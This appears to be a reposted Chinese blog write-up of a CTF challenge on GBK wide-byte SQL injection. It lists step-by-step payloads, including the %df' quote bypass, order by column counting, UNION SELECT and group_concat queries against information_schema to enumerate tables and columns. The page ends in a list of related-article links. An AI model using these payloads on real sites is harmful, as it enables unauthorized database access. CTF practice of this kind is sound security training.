博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
南邮CTF--SQL注入题
阅读量:6607 次
发布时间:2019-06-24

本文共 790 字,大约阅读时间需要 2 分钟。

南邮CTF--SQL注入题

题目:GBK SQL injection

解析:

1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入

2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功

3.继续改参数,1=2时,没有任何信息,找到注入点

4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显示错误,确定为2列。

5.既然查询到列,使用联合查询,union select 1,2 %23,

6.获取当前数据库:union select 1,database() %23

7.获取当前数据库名: id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23

group_concat(table_name) 分组以后,把想要显示的列通过gruop_concat()函数拼接在一起。

information_schema.TABLES 切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。

8.获取表名(ctf-4)id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x63746634 %23

 

转载于:https://www.cnblogs.com/AxsCtion/p/10885837.html

你可能感兴趣的文章
django中的权限控制(form增删改)
查看>>
STL学习笔记--非变易算法
查看>>
mysql设置字符集CHARACTER SET
查看>>
redis 系列15 数据对象的(类型检查,内存回收,对象共享)和数据库切换
查看>>
log框架集成
查看>>
python命令行下安装redis客户端
查看>>
如何在Oracle中复制表结构和表数据
查看>>
[河南省ACM省赛-第四届] 序号互换 (nyoj 303)
查看>>
SICIP-1.3-Defining a new function
查看>>
3 Oracle 32位客户端安装及arcgis连接
查看>>
scala2.12.5在windows10、osmac10.13上的安装
查看>>
转自老叶茶馆]系列 — processlist中哪些状态要引起关注
查看>>
小程序上拉加载的坑
查看>>
c++强制类型转换(总结)
查看>>
Server Develop (七) Linux 守护进程
查看>>
libevent (三) 事件注册与循环监听
查看>>
seaborn笔记
查看>>
win10安装ubuntu16.04双系统
查看>>
读人月神话有感
查看>>
Python第一天
查看>>